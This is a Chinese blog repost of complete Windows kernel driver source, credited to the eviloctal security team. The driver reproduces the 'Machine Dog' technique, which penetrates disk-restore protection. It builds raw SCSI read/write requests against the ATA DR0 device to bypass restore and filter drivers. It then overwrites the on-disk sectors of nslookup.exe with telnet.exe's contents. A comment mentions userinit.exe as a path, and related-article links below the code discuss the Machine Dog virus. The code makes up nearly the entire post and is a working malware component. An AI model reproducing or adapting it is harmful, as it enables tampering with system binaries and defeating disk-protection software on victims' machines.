机器狗穿透还原的磁盘级文件读写完整驱动代码

最新推荐文章于 2019-09-16 00:23:19 发布
最新推荐文章于 2019-09-16 00:23:19 发布
阅读量1.2k 收藏
点赞数
分类专栏: 驱动开发学习

 转载自:http://www.smatrix.org/bbs/read.php?tid=4920

 

文章作者:Eros412

信息来源:邪恶八进制信息安全团队(www.eviloctal.com


#include<ntddk.h>
#include<srb.h>
#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073
#define PARTITION_TYPE_NTFS         0x07
#define PARTITION_TYPE_FAT32        0x0B
#define PARTITION_TYPE_FAT32_LBA    0x0C

extern POBJECT_TYPE* IoDriverObjectType;
LARGE_INTEGER realdiskpos;
ULONG sectorspercluster;

typedef struct RETRIEVAL_POINTERS_BUFFER {
  ULONG ExtentCount;
  LARGE_INTEGER StartingVcn;
  struct {
    LARGE_INTEGER NextVcn;
    LARGE_INTEGER Lcn;
  } Extents[1];
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;

typedef struct {  
    LARGE_INTEGER StartingVcn;
} STARTING_VCN_INPUT_BUFFER,  *PSTARTING_VCN_INPUT_BUFFER;

typedef struct _SENSE_DATA {
  unsigned char Valid;
  unsigned char SegmentNumber;
  unsigned char FileMark;
  unsigned char Information[4];
  unsigned char AdditionalSenseLength;
  unsigned char CommandSpecificInformation[4];
  unsigned char AdditionalSenseCode;
  unsigned char AdditionalSenseCodeQualifier;
  unsigned char FieldReplaceableUnitCode;
  unsigned char SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;

#pragma pack(1)
typedef struct _PARTITION_ENTRY
{
  UCHAR active;               
  UCHAR StartHead;             
  UCHAR StartSector;           
  UCHAR StartCylinder;         
  UCHAR PartitionType;         
  UCHAR EndHead;               
  UCHAR EndSector;             
  UCHAR EndCylinder;         
  ULONG StartLBA;             
  ULONG TotalSector;           
} PARTITION_ENTRY, *PPARTITION_ENTRY;

typedef struct _MBR_SECTOR
{
  UCHAR            BootCode[446];
  PARTITION_ENTRY  Partition[4];
  USHORT          Signature;
} MBR_SECTOR, *PMBR_SECTOR;

typedef struct _BBR_SECTOR
{
  USHORT JmpCode;         
  UCHAR  NopCode;           
  UCHAR  OEMName[8];       
  USHORT BytesPerSector;     
  UCHAR  SectorsPerCluster;
  USHORT ReservedSectors;     
  UCHAR  NumberOfFATs;       
  USHORT RootEntries;     
  USHORT NumberOfSectors16;   
  UCHAR  MediaDescriptor;   
  USHORT SectorsPerFAT16;   
  USHORT SectorsPerTrack;   
  USHORT HeadsPerCylinder;   
  ULONG  HiddenSectors;     
  ULONG  NumberOfSectors32;   
  ULONG  SectorsPerFAT32;     
} BBR_SECTOR, *PBBR_SECTOR;

#pragma pack()
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;             
    CHAR ImageName[255];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
    IN PUNICODE_STRING ObjectName,
    IN ULONG Attributes,
    IN PACCESS_STATE AccessState OPTIONAL,
    IN ACCESS_MASK DesiredAccess OPTIONAL,
    IN POBJECT_TYPE ObjectType,
    IN KPROCESSOR_MODE AccessMode,
    IN OUT PVOID ParseContext OPTIONAL,
    OUT PVOID* Object );
    
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength);
    
NTSTATUS
IrpCompletionRoutine(
    IN PDEVICE_OBJECT  DeviceObject,
    IN PIRP  Irp,
    IN PVOID  Context
    )
{
    PMDL mdl;
    Irp->UserIosb->Status=Irp->IoStatus.Status;
    Irp->UserIosb->Information=Irp->IoStatus.Information;
    if(! Context)
    {
        mdl=Irp->MdlAddress;
        if(mdl){
            DbgPrint("read size: %d..", Irp->IoStatus.Information);
            MmUnlockPages(mdl);
            IoFreeMdl(mdl);
        }
    }
    KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
    IoFreeIrp(Irp);
    return STATUS_MORE_PROCESSING_REQUIRED;
}

NTSTATUS IrpCompletionRoutine_0(
    IN PDEVICE_OBJECT  DeviceObject,
    IN PIRP  Irp,
    IN PVOID  Context
    )
{
    PMDL mdl;
    Irp->UserIosb->Status=Irp->IoStatus.Status;
    Irp->UserIosb->Information=Irp->IoStatus.Information;
    if (! Context )
    {
        mdl=Irp->MdlAddress;
        if ( mdl )
        {
            DbgPrint("read size: %d..", Irp->IoStatus.Information);
            MmUnlockPages(mdl);
            IoFreeMdl(mdl);
        }
    }
    KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
    IoFreeIrp(Irp);
    return STATUS_MORE_PROCESSING_REQUIRED;
}

ULONG GetModuleBase(char* name){
    ULONG                      n,i ;
    PSYSTEM_MODULE_INFORMATION  module;
    PVOID                      pbuftmp;
    char modulename[255];
    ZwQuerySystemInformation(11, &n, 0, &n);
    pbuftmp = ExAllocatePool(NonPagedPool, n);
    ZwQuerySystemInformation(11, pbuftmp, n, NULL);
    module = (PSYSTEM_MODULE_INFORMATION)((PULONG )pbuftmp + 1 );
    n = *((PULONG)pbuftmp );
    for ( i = 0; i < n; i++ )
    {
        strcpy(modulename,module[i].ImageName + module[i].ModuleNameOffset);
        if(!_strnicmp(modulename,name,strlen(name))){
                ExFreePool(pbuftmp);
                return (ULONG)module[i].Base;
        }
    }
    ExFreePool(pbuftmp);
    return 0;
}

NTSTATUS MyIoCallDriver(PDEVICE_OBJECT DeviceObject,PIRP Irp)//自己的IoCallDriver
{
    PIO_STACK_LOCATION stack;
    --Irp->CurrentLocation;
    stack = IoGetNextIrpStackLocation( Irp );
    Irp->Tail.Overlay.CurrentStackLocation= stack;//移动堆栈
    stack->DeviceObject=DeviceObject;
    return (DeviceObject->DriverObject->MajorFunction[(ULONG)stack->MajorFunction])(DeviceObject, Irp);
}

ULONG  AtapiReadWriteDisk(PDEVICE_OBJECT dev_object,ULONG MajorFunction, PVOID buffer,ULONG DiskPos, int BlockCount)
{
    NTSTATUS status;
    PSCSI_REQUEST_BLOCK srb;
    PSENSE_DATA sense;
    KEVENT Event;
    PIRP irp;
    PMDL mdl;
    IO_STATUS_BLOCK isb;
    PIO_STACK_LOCATION isl;
    PVOID psense;
    int count=8;
    while(1){
        srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK));
        if(!srb)
        {
            break;
        }
        sense=ExAllocatePool(0,sizeof(SENSE_DATA));
        psense=sense;
        if(!sense)
        {
            break;
        }
        memset(srb,0,sizeof(SCSI_REQUEST_BLOCK));
        memset(sense,0,sizeof(SENSE_DATA));
        srb->Length=sizeof(SCSI_REQUEST_BLOCK);//更多关于srb,请看《SCSI 总线和IDE接口:协议、应用和编程》和《SCSI程序员指南》
        srb->Function=0;
        srb->DataBuffer=buffer;
        srb->DataTransferLength=BlockCount<<9;//sector size*number of sector
        srb->QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE;
        srb->SrbStatus=0;
        srb->ScsiStatus=0;
        srb->NextSrb=0;
        srb->SenseInfoBuffer=sense;
        srb->SenseInfoBufferLength=sizeof(SENSE_DATA);
        if(MajorFunction==IRP_MJ_READ)
                srb->SrbFlags=SRB_FLAGS_DATA_IN;
        else
                srb->SrbFlags=SRB_FLAGS_DATA_OUT;
                
        if(MajorFunction==IRP_MJ_READ)
            srb->SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE;
            
        srb->SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE;
        srb->TimeOutValue=(srb->DataTransferLength>>10)+1;
        srb->QueueSortKey=DiskPos;
        srb->CdbLength=10;
        srb->Cdb[0]=2*((UCHAR)MajorFunction+ 17);
        srb->Cdb[1]=srb->Cdb[1] & 0x1F | 0x80;
        srb->Cdb[2]=(unsigned char)(DiskPos>>0x18)&0xFF;    //
        srb->Cdb[3]=(unsigned char)(DiskPos>>0x10)&0xFF;    //
        srb->Cdb[4]=(unsigned char)(DiskPos>>0x08)&0xFF;    //
        srb->Cdb[5]=(UCHAR)DiskPos;          //填写sector位置
        srb->Cdb[7]=(UCHAR)BlockCount>>0x08;
        srb->Cdb[8]=(UCHAR)BlockCount;
        //By:Eros412
        KeInitializeEvent(&Event, 0, 0);
        irp=IoAllocateIrp(dev_object->StackSize,0);
        mdl=IoAllocateMdl(buffer, BlockCount<<9, 0, 0, irp);
        irp->MdlAddress=mdl;
        if(!mdl){
            ExFreePool(srb);
            ExFreePool(psense);
            IoFreeIrp(irp);
            return STATUS_INSUFFICIENT_RESOURCES;
        }
        MmProbeAndLockPages(mdl,0,(MajorFunction==IRP_MJ_READ?0:1));
        srb->OriginalRequest=irp;
        irp->UserIosb=&isb;
        irp->UserEvent=&Event;
        irp->IoStatus.Status=0;
        irp->IoStatus.Information=0;
        irp->Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE;
        irp->AssociatedIrp.SystemBuffer=0;
        irp->Cancel=0;
        irp->RequestorMode=0;
        irp->CancelRoutine=0;
        irp->Tail.Overlay.Thread=PsGetCurrentThread();
        isl=IoGetNextIrpStackLocation(irp);
        isl->DeviceObject=dev_object;
        isl->MajorFunction=IRP_MJ_SCSI;
        isl->Parameters.Scsi.Srb=srb;
        isl->CompletionRoutine=IrpCompletionRoutine_0;
        isl->Context=srb;
        isl->Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR;
        status=MyIoCallDriver(dev_object,irp);
        KeWaitForSingleObject(&Event, 0, 0, 0, 0);
        if(srb->SenseInfoBuffer!=psense&&srb->SenseInfoBuffer)
                ExFreePool(srb->SenseInfoBuffer);
        ExFreePool(srb);
        ExFreePool(psense);
        if ( status >= 0 || !count )
            return status;
        DbgPrint("Send XXX Failed..%08x/r/n", status);
        KeStallExecutionProcessor(1u);
        --count;
    }
    return STATUS_INSUFFICIENT_RESOURCES;
}

PDEVICE_OBJECT GetLastDiskDeviceObject(PDRIVER_OBJECT drv_object)//这个就是DR0
{
  PDEVICE_OBJECT result;
  PDEVICE_OBJECT finddev;
  finddev=drv_object->DeviceObject;
  result=NULL;
  while (finddev)
  {
    if (finddev->DeviceType==FILE_DEVICE_DISK)
      result = finddev;
    finddev=finddev->NextDevice;
  }
  return result;
}


PDEVICE_OBJECT GetAtaDr0DevObject()
{
    UNICODE_STRING diskstr;
    PDRIVER_OBJECT diskdrv;
    PDEVICE_OBJECT dr0dev;
    RtlInitUnicodeString(&diskstr, L"//Driver//Disk");
    if(ObReferenceObjectByName(&diskstr,64,0,0,*IoDriverObjectType,0,0,&diskdrv)<0)
        return NULL;
    dr0dev=GetLastDiskDeviceObject(diskdrv);
    if(dr0dev)
    DbgPrint("Eros412 said : ata dr0 dev obj is : %08x...",dr0dev);
    ObfDereferenceObject(diskdrv);
    return dr0dev;
}

PDEVICE_OBJECT GetFileObjectDevice(PFILE_OBJECT Object)
{
    PDEVICE_OBJECT result=NULL;
    PVPB vpb;
    vpb=Object->Vpb;
    result=vpb->DeviceObject;
    if(!vpb||!result)
    {
        if(!Object->DeviceObject->Vpb||!Object->DeviceObject->Vpb->DeviceObject)
            result=Object->DeviceObject;
    }
    return result;
}

PLARGE_INTEGER GetPosAndCluster()//得到第一个分区文件数据的起始位置
{
    PVOID buffer;
    ULONG type,startlba;
    int i;
    PLARGE_INTEGER result;
    PDEVICE_OBJECT dev;
    PMBR_SECTOR mbrsec;
    PPARTITION_ENTRY partition0;
    PBBR_SECTOR bootsec;
    result=ExAllocatePool(0,sizeof(LARGE_INTEGER));
    dev=GetAtaDr0DevObject();
    if(dev)
    {
        buffer=ExAllocatePool(0,512);
        memset(buffer,0,512);
        if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, 0, 1)>0)
            DbgPrint("AtapiReadWriteDisk ok");
        mbrsec=(PMBR_SECTOR)buffer;
        partition0=&mbrsec->Partition[0];
        startlba=partition0[0].StartLBA;
        type=partition0[0].PartitionType;
        DbgPrint("dwPartOnePos:0x%08x..1", startlba);
        result->QuadPart=startlba;
        memset(buffer,0,512);
        if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, startlba, 1)>0){
            bootsec=(PBBR_SECTOR)buffer;
                DbgPrint("gSectorsPerCluster:%d...", bootsec->SectorsPerCluster);
                sectorspercluster=bootsec->SectorsPerCluster;
        }
        result->QuadPart+=bootsec->ReservedSectors;
        DbgPrint("dwPartOnePos:%I64x..2/r/n", result->QuadPart);
        if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA)
            result->QuadPart+=bootsec->NumberOfFATs*bootsec->SectorsPerFAT32;
        DbgPrint("dwPartOnePos:%I64x..3/r/n", result->QuadPart);
    }
    else
        result->QuadPart=0;
        
    return result;
}

NTSTATUS
OpenFile(PHANDLE FileHandle,PWCHAR filename)
{
    NTSTATUS status;
    ULONG v3;
    int v5;
    UNICODE_STRING DestinationString;
    OBJECT_ATTRIBUTES ObjectAttributes;
    struct _IO_STATUS_BLOCK IoStatusBlock;
    RtlInitUnicodeString(&DestinationString, filename);//L"//SystemRoot//System32//userinit.exe"
    ObjectAttributes.ObjectName = &DestinationString;
    ObjectAttributes.Length = 24;
    ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.Attributes =OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE;// 576;
    ObjectAttributes.SecurityDescriptor = 0;
    ObjectAttributes.SecurityQualityOfService = 0;
    status = IoCreateFile(FileHandle, GENERIC_READ , &ObjectAttributes, &IoStatusBlock, 0, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN , 0x50u, 0, 0, 0, 0, 0);
    if ( status != STATUS_SUCCESS)
    DbgPrint("Open File failed...%08x..", status );
    return status;
}

PLARGE_INTEGER getfilesize(PWCHAR filename){
    PLARGE_INTEGER filesize;
    HANDLE hfile;
    IO_STATUS_BLOCK IoStatusBlock;
    filesize=ExAllocatePool(0,sizeof(LARGE_INTEGER));
    OpenFile(&hfile,filename);
    ZwQueryInformationFile(hfile, &IoStatusBlock, filesize, 24, FileStandardInformation);
    return filesize;
}

NTSTATUS InitSectors(PWCHAR filename){//得到文件在扇区的位置,存放在realdiskpos
    PLARGE_INTEGER diskpos;
    NTSTATUS status,newstatus;
    HANDLE filehandle;
    PVOID testingpool;
    IO_STATUS_BLOCK iosb;
    LARGE_INTEGER ByteOffset;
    PFILE_OBJECT Object;
    PDEVICE_OBJECT dev;
    PIRP irp;
    KEVENT Event;
    IO_STATUS_BLOCK iosb2;
    PIO_STACK_LOCATION nextio;
    STARTING_VCN_INPUT_BUFFER StartVcn;
    unsigned char abBuffer[1024];
    PRETRIEVAL_POINTERS_BUFFER pVcnPairs;
    realdiskpos.QuadPart=0;
    StartVcn.StartingVcn.QuadPart=0;
       
    memset(abBuffer, 0, 1024);
    pVcnPairs = (PRETRIEVAL_POINTERS_BUFFER)abBuffer;
    if(OpenFile(&filehandle,filename)!= STATUS_SUCCESS)
            return 1;
    testingpool=ExAllocatePool(0,512);
    ByteOffset.QuadPart=0;
    if(ZwReadFile(filehandle,0,0,0,&iosb,testingpool,512,&ByteOffset,0)!=STATUS_SUCCESS){
            DbgPrint("ZwReadFile error");
            goto end;
    }
    if(ObReferenceObjectByHandle(filehandle,0,(POBJECT_TYPE)*IoFileObjectType,0,&Object,0)<0){
            DbgPrint("ObReferenceObjectByHandle error");
            goto end;
    }
    dev=GetFileObjectDevice(Object);
    if(!dev){
        DbgPrint("Get Device Object error");
        goto end2;
    }
    DbgPrint("pDevObj is: %08x...",dev);
    irp=IoAllocateIrp( dev->StackSize, 0);
    if(irp==NULL)
        goto end2;
    KeInitializeEvent(&Event, SynchronizationEvent, 0);
    irp->AssociatedIrp.SystemBuffer=&StartVcn;
    irp->UserBuffer=pVcnPairs;
    irp->UserEvent=&Event;
    irp->MdlAddress=0;
    irp->UserIosb=&iosb2;
    irp->RequestorMode=KernelMode;
    irp->Tail.Overlay.Thread=PsGetCurrentThread();
    irp->Tail.Overlay.OriginalFileObject=Object;
    irp->Flags = 0;
    nextio = IoGetNextIrpStackLocation(irp);
    nextio->MajorFunction=IRP_MJ_FILE_SYSTEM_CONTROL;
    nextio->DeviceObject=dev;
    nextio->FileObject=Object;
    nextio->Parameters.FileSystemControl.InputBufferLength= sizeof(STARTING_VCN_INPUT_BUFFER);
    nextio->Parameters.FileSystemControl.FsControlCode=FSCTL_GET_RETRIEVAL_POINTERS;
    nextio->Parameters.FileSystemControl.Type3InputBuffer=&StartVcn;
    nextio->Parameters.FileSystemControl.OutputBufferLength=1024;
    nextio->CompletionRoutine=IrpCompletionRoutine;
    nextio->Context=0;
    nextio->Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR;
 
    MyIoCallDriver(dev,irp);
    KeWaitForSingleObject(&Event, 0,0,0, NULL);
    newstatus = iosb2.Status;
    if(newstatus<0){
        DbgPrint("MyIofCallDriver  failed:%08x...",newstatus);
        goto end2;
    }
    DbgPrint("ExtentCount = %d",pVcnPairs->ExtentCount);
    DbgPrint("StartLcn = %I64x",pVcnPairs->Extents[0].Lcn.QuadPart);
    diskpos=GetPosAndCluster();
    realdiskpos.QuadPart=diskpos->QuadPart+sectorspercluster*pVcnPairs->Extents[0].Lcn.QuadPart;
    if(diskpos){
        DbgPrint("gDiskPos is: %I64x..Cluster:%d...part offset: %08x..",realdiskpos.QuadPart,sectorspercluster,diskpos->QuadPart);
    }
    return 0;
end2:
    if(irp!=NULL)
    IoFreeIrp(irp);
    ObDereferenceObject(Object);
end:
    ZwClose(filehandle);
    if(testingpool)
    ExFreePool(testingpool);
    return 1;
}


VOID DriverUnload(
    IN PDRIVER_OBJECT  DriverObject
    )
{
    KdPrint(("DriverUnload Run!\n"));
}

NTSTATUS
 DriverEntry(
    IN PDRIVER_OBJECT  DriverObject,
    IN PUNICODE_STRING  RegistryPath
    )
{
    PLARGE_INTEGER filesize;
    PDEVICE_OBJECT dev;
    PVOID buf;
    ULONG psector;
    DriverObject->DriverUnload =DriverUnload;
    InitSectors(L"//??//c://telnet.exe");
    /*找了两个大小差不多的文件,把telnet.exe的binary code拷贝到nslookup.exe,系统重启后生效(注:当exe执行时FSD从cache里把内容拷贝过来,所以需要重启)*/
    
    filesize=getfilesize(L"//??//c://telnet.exe");
    buf=ExAllocatePool(0,filesize->LowPart);
    memset(buf,0x00,filesize->LowPart);
    dev=GetAtaDr0DevObject();
    psector=realdiskpos.LowPart;
    if(dev!=NULL&&psector!=0&&buf!=NULL){
        AtapiReadWriteDisk(dev,IRP_MJ_READ,buf,psector,(filesize->LowPart/512)+1);
        InitSectors(L"//??//c://nslookup.exe");
        filesize=getfilesize(L"//??//c://nslookup.exe");
        psector=realdiskpos.LowPart;
        AtapiReadWriteDisk(dev,IRP_MJ_WRITE,buf,psector,(filesize->LowPart/512)+1);
    }
    return STATUS_SUCCESS;
}


cosmoslife
关注
专栏目录
2024Java面试-Redis常见面试题(1)
青松之竹_Java博客
04-20 89
给大家介绍下目前市面上Java方面Redis常见的面试题
磁盘还原驱动代码
10-23
磁盘过滤,实现对系统的还原,是初学驱动编程参考的好资料
穿透还原的工作原理分析(逆向工程)--机器狗
01-23 2826
 文章末尾所添加的机器狗、IGM、写穿还原的工具(已可以被卡巴检测到是病毒)是在无敌小龙那里看到的,我加了个备用地址。 样本脱壳 OD加载样本explorer.exe, 对GetModuleHandleA下断,参数为NULL时即为入口点处对此函数的调用, 退出CALL之后可以得到入口为 004016ED。 重新加载样本,对004016ED下内存写入断点,中断后StepOver一步,然后在0
第四代机器狗驱动代码
hmugua的专栏
10-16 1006
(转)第四代机器狗驱动代码#include#includeULONG * realssdt;#define SEC_IMAGE  0x01000000#pragma pack(1)typedef struct ServiceDescriptorEntry {  unsigned int *ServiceTableBase;  unsigned int *ServiceCounterTableB
还原软件实施更安全防护机器狗
weixin_33805992的博客
09-21 81
谈谈历史吧!2005-2007年以来,机器狗问世以来。给不少使用还原软件的场合,带来极大的麻烦甚至是灾难性的后果。还原软件声称不会被任何病毒等类程序侵袭的传说也被机器狗打破,保证系统不被破坏的神话也就此消失。.... 机器狗之所以有机可乘,这是因为微软在磁盘驱动层留下了RING3控制口。发送控制码可直接操作磁盘,本身该接口留下是为了方便一些特殊软件如...
机器狗穿透还原磁盘文件读写完整驱动
05-29
根据给定文件的信息,我们可以分析出这是一段与操作系统内核相关的代码,主要涉及的是一个针对特定场景(如机器狗穿透还原)下实现磁盘文件读写驱动程序。接下来,我们将围绕标题、描述和部分代码片段来深入探讨...
变形机器狗解析
09-07
2. **穿透式攻击**:由于采用了底层hook技术,“变形机器狗”可以轻易绕过现有的防病毒软件及系统还原机制。这意味着即便用户安装了最新的安全软件或使用了硬件别的还原卡也无法阻止其入侵和破坏。此外,该病毒还...
电脑 快速还原4.2
06-05
如:(c:\windows\system32\userinit.exe)上述文件系统已经自动加入,已经可以免疫“机器狗”等穿透还原型病毒。 “机器狗”病毒资料 http://www.pubgen.net/bbs3/dispbbs.asp?boardID=4&ID=579&page=1 安装注意:...
快乐网管超保护 12
05-10
运行稳定,不耗资源,不怕机器狗和类似的变种 超保护有效防止被恶意破解 不用重启而即时转储更新的游戏数据。 支持IDE、SISI、SATA磁盘格式和他们的磁盘组(各种RAID模式) 支持所有系统分区格式,不和任何驱动...
开源自写磁盘还原
04-13
开源自写磁盘还原,经过先数字的改进,目前已经很稳定。
NTFS磁盘还原,支持动态穿透写文件
03-05
磁盘还原程序,支持动态穿透还原写文件 支持系统:WINXP,WIN7 支持文件系统:NTFS 文件说明 DiskFlt.exe 还原控制程序,用于安装驱动与卸载 diskflt.sys 还原核心驱动程序 NtfsTest.exe 测试还原穿透文件测试程序,请在安装还原后运行。 声明: 测试本程序请在虚拟机中测试,以上程序由于都用CREATEFILE 打开磁盘分区,所以有些敏感杀软可能误认为病毒。 支持全盘还原,可还原在用户下的一切磁盘操作,完全阻止病毒入侵。可防止用户删除分区。格式化等一系列对磁盘的操作,重启后立即还原如初。 支持还原状态中动态更新磁盘文件内容(俗称:穿透还原)技术,可以在还原状态下。直接对磁盘分区进行文件创建,写入,修改,删除等操作。穿透写入的数据将真实写入,重启后写入的文件依旧有效。 还原驱动实现原理: 还原驱动是采用磁盘过滤驱动框架完成。实现原理是在驱动中对NTFS读写操作的簇进行了映射。从而实现不破坏原有数据进行写入。重启后还原穿透还原原理: 在以上还原过程中。在磁盘过滤驱动层,实现了一套完成的NTFS文件系统。在用户要穿透文件时,是用户直接向文件操作发送到磁盘过滤驱动的NTFS文件系统。所以这个穿透还原写文件后。文件已经真实重在。马上可以使用。
windows内核 自创建IRP访问文件加非递归遍历文件
09-01
windows内核,自构建IRP,防止rootkey 隐藏隐藏文件或拦截,加上非递归遍历文件(内核栈小不递归)代码完整例子
利用BIOS指令实现读磁盘
裂帛一剑
10-10 1471
利用BIOS指令实现了读磁盘 在大多数情况下,程序只指定读一个扇区或读取一个磁道上的全部扇区。读操作只是顺序读取CH和CL指定的扇区内容,并递增CH和CL中的磁道号和扇区号,如果扇区号超过了磁道的最大扇区号,必须把扇区号重新置1,并把磁道号增1,或者把双面盘的0面变1面。(1)本程序计算每一个磁盘地址,每次读操作之后,扇区号+1,当扇区号加到10则重新置扇区号为1,如果盘面是1则增加磁
DeviceIoControl获取文件LCN
Nero Zhang的博客
10-15 652
在灾备项目组做CDP(Continual Data Protection),刚刚入门,最近看了下关于磁盘的操作,记录一下DeviceIoControl()。 NTFS中的文件结构 NTFS文件系统中,磁盘文件存储管理的最小单位是簇(Cluster)。一个簇由连续的若干个扇区构成。对于一个文件来说,我们将其在磁盘上占用的连续的簇称为簇流(Cluster Runs,不知道怎么翻译,有人称之为簇流,
DeviceIoControl 直接从磁盘扇区读文件
flyingleo1981的专栏
11-10 1232
好久没写博客了,最近看了下DeviceIoControl  关于磁盘的应用,特记一文,以备久后查阅。 首先介绍下,文件在磁盘的存储结构(具体可以到网上查询NTFS文件系统相关的教程后者数据恢复方面教程的介绍)。下面介绍的仅与此文相关。 文件属性(头): (Ps: 截图摘自[数据重现文件系统原理精解与数据恢复最佳实践].(马林))
打开被独占的文件方法(三) -- 使用直接硬盘访问读取文件
anhkgg的专栏
04-27 3094
打开被独占的文件方法(三) -- 使用直接硬盘访问读取文件 2010年06月08日 星期二 11:41 来自:http://hi.baidu.com/wsh_chb/blog/item/60556ea1f6787d86471064a8.html 使用直接硬盘访问读取文件 “直接访问硬盘”这个想法当然很酷,但很快DOS编程爱好者们就会失望,这里没有硬件操作,因为
文件存储:File Systems 文件系统
weixin_42465002的博客
09-16 1552
Applications rely on file systems to store and retrieve information on mass storage devices. File systems provide the underlying support that applications need to create and access files and directo...
【个人理解】探究MDL
tbwork
03-20 3800
     以下的虚拟内存可以理解成逻辑内存,因为我觉得只有这样才能讲通下面所有的东西。以下的“未分页”指没有为页进行编码。以下为MDL结构体(我很郁闷,我在MSDN上没有找到这个结构体)typedef struct _MDL {   struct _MDL *Next;   //下一个MDL   CSHORT Size;       //大小   CSHORT MdlFlags;  //标志,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值